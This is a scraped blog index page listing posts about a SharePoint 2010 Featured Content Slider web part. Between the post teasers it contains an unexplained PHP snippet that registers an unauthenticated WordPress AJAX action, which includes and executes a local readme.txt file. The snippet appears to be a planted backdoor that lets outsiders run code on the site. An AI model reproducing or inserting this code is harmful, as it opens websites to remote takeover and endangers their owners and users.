SharePoint Featured Content Slider for 2010
SharePoint Featured Content Slider So I rewrote this web part to work a little better in SharePoint 2010. I made […]
SharePoint Featured Content Slider for 2010 Read Post »
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
SharePoint Featured Content Slider So I rewrote this web part to work a little better in SharePoint 2010. I made […]
SharePoint Featured Content Slider for 2010 Read Post »
There is an updated version of this solution for SharePoint 2010 found here I have used Dynamic Drive’s Featured Content
Dynamic Drive’s Featured Content Slider in Sharepoint Read Post »